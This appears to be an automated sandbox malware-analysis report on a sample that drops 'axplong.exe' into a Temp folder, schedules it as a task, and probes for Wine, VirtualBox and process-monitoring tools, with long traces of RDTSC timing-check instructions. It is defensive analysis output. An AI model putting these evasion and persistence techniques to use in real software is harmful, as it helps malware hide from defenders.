Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: netutils.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: file.exe

Static file information: File size 1929216 > 1048576

Source: file.exe

Static PE information: Raw size of mrrxutca is bigger than: 0x100000 < 0x1a5400

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.3c0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mrrxutca:EW;gmpmgtcb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mrrxutca:EW;gmpmgtcb:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 2.2.axplong.exe.d10000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mrrxutca:EW;gmpmgtcb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mrrxutca:EW;gmpmgtcb:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 3.2.axplong.exe.d10000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mrrxutca:EW;gmpmgtcb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mrrxutca:EW;gmpmgtcb:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 7.2.axplong.exe.d10000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mrrxutca:EW;gmpmgtcb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mrrxutca:EW;gmpmgtcb:EW;.taggant:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: axplong.exe.0.dr	Static PE information: real checksum: 0x1e2edb should be: 0x1d814d
Source: file.exe	Static PE information: real checksum: 0x1e2edb should be: 0x1d814d

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: mrrxutca
Source: file.exe	Static PE information: section name: gmpmgtcb
Source: file.exe	Static PE information: section name: .taggant
Source: axplong.exe.0.dr	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name: .idata
Source: axplong.exe.0.dr	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name: mrrxutca
Source: axplong.exe.0.dr	Static PE information: section name: gmpmgtcb
Source: axplong.exe.0.dr	Static PE information: section name: .taggant

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Code function: 7_2_00D2D84C push ecx; ret

7_2_00D2D85F

Source: file.exe	Static PE information: section name: entropy: 7.983894166340195
Source: file.exe	Static PE information: section name: mrrxutca entropy: 7.952707462434755
Source: axplong.exe.0.dr	Static PE information: section name: entropy: 7.983894166340195
Source: axplong.exe.0.dr	Static PE information: section name: mrrxutca entropy: 7.952707462434755

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: Regmonclass	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File created: C:\Windows\Tasks\axplong.job

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A78F7 second address: 5A78FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A6CD6 second address: 5A6CF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F5A147D6A26h 0x0000000a jne 00007F5A147D6A26h 0x00000010 popad 0x00000011 push ecx 0x00000012 jmp 00007F5A147D6A2Dh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A8C36 second address: 5A8C47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b ja 00007F5A14B6C836h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A8C47 second address: 5A8C4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A8D08 second address: 5A8D4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jnl 00007F5A14B6C836h 0x0000000d pop edi 0x0000000e popad 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push edx 0x00000014 push ecx 0x00000015 pushad 0x00000016 popad 0x00000017 pop ecx 0x00000018 pop edx 0x00000019 pop eax 0x0000001a or edx, dword ptr [ebp+122D2A18h] 0x00000020 lea ebx, dword ptr [ebp+1244DB54h] 0x00000026 cmc 0x00000027 xchg eax, ebx 0x00000028 jc 00007F5A14B6C83Eh 0x0000002e push eax 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F5A14B6C83Bh 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A8D4C second address: 5A8D5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5A147D6A2Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A8EBB second address: 5A8F18 instructions: 0x00000000 rdtsc 0x00000002 je 00007F5A14B6C836h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c add dword ptr [ebp+122D1DA9h], esi 0x00000012 push 00000000h 0x00000014 or dword ptr [ebp+122D2598h], edi 0x0000001a mov dword ptr [ebp+122D2598h], edx 0x00000020 call 00007F5A14B6C839h 0x00000025 jmp 00007F5A14B6C848h 0x0000002a push eax 0x0000002b jnc 00007F5A14B6C842h 0x00000031 mov eax, dword ptr [esp+04h] 0x00000035 push eax 0x00000036 push edx 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A8F18 second address: 5A8F1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A8F1D second address: 5A8F3C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A14B6C83Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d js 00007F5A14B6C83Ch 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A8F3C second address: 5A8FA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F5A147D6A34h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f jmp 00007F5A147D6A2Dh 0x00000014 pop eax 0x00000015 jmp 00007F5A147D6A2Bh 0x0000001a push 00000003h 0x0000001c and di, 51DFh 0x00000021 push 00000000h 0x00000023 mov ecx, dword ptr [ebp+122D2D83h] 0x00000029 pushad 0x0000002a movsx eax, cx 0x0000002d jp 00007F5A147D6A2Ch 0x00000033 mov dword ptr [ebp+122D1CCDh], ebx 0x00000039 popad 0x0000003a push 00000003h 0x0000003c call 00007F5A147D6A29h 0x00000041 push edx 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A8FA2 second address: 5A8FB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jng 00007F5A14B6C836h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A8FB4 second address: 5A8FB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A8FB9 second address: 5A8FD4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A14B6C83Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A8FD4 second address: 5A8FD9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5CB4AE second address: 5CB4B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5CB4B4 second address: 5CB4C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b js 00007F5A147D6A26h 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5CB4C6 second address: 5CB4CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5CB4CC second address: 5CB4D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F5A147D6A26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 595AD3 second address: 595ADD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F5A14B6C836h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 595ADD second address: 595AE7 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5A147D6A26h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C9298 second address: 5C929C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C929C second address: 5C92A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push esi 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C92A9 second address: 5C92B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C92B6 second address: 5C92C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F5A147D6A26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C92C0 second address: 5C92C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C9579 second address: 5C9583 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F5A147D6A26h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C9583 second address: 5C958C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C96DE second address: 5C96F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A147D6A2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jns 00007F5A147D6A26h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C96F7 second address: 5C970E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F5A14B6C83Ch 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C970E second address: 5C9714 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C9B10 second address: 5C9B1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F5A14B6C836h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C9B1C second address: 5C9B32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5A147D6A31h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C9B32 second address: 5C9B37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C9B37 second address: 5C9B4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c je 00007F5A147D6A26h 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C9B4D second address: 5C9B77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a push edx 0x0000000b pop edx 0x0000000c pop esi 0x0000000d push edx 0x0000000e jne 00007F5A14B6C836h 0x00000014 jmp 00007F5A14B6C845h 0x00000019 pop edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C9B77 second address: 5C9B8D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F5A147D6A31h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C9B8D second address: 5C9B98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C9B98 second address: 5C9B9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C9ECF second address: 5C9EDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F5A14B6C836h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5CA1B8 second address: 5CA1C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007F5A147D6A26h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5CA4B5 second address: 5CA4B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5CA4B9 second address: 5CA4F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F5A147D6A2Ah 0x0000000c jmp 00007F5A147D6A37h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F5A147D6A32h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5CA692 second address: 5CA69A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5CA69A second address: 5CA6B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5A147D6A37h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5CA6B7 second address: 5CA6BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5CA6BB second address: 5CA6BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5CA6BF second address: 5CA6C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D1471 second address: 5D1477 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D1477 second address: 5D147B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D035C second address: 5D0366 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F5A147D6A26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D0A78 second address: 5D0A7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D1AE0 second address: 5D1AE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D1AE7 second address: 5D1AFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F5A14B6C836h 0x0000000a popad 0x0000000b popad 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D1AFD second address: 5D1B01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D1B01 second address: 5D1B07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D1B07 second address: 5D1B0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D1B0D second address: 5D1B11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D1B11 second address: 5D1B15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D1B15 second address: 5D1B41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jne 00007F5A14B6C849h 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 pop eax 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D580F second address: 5D5840 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F5A147D6A48h 0x0000000c jmp 00007F5A147D6A2Dh 0x00000011 jmp 00007F5A147D6A35h 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D5840 second address: 5D5848 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
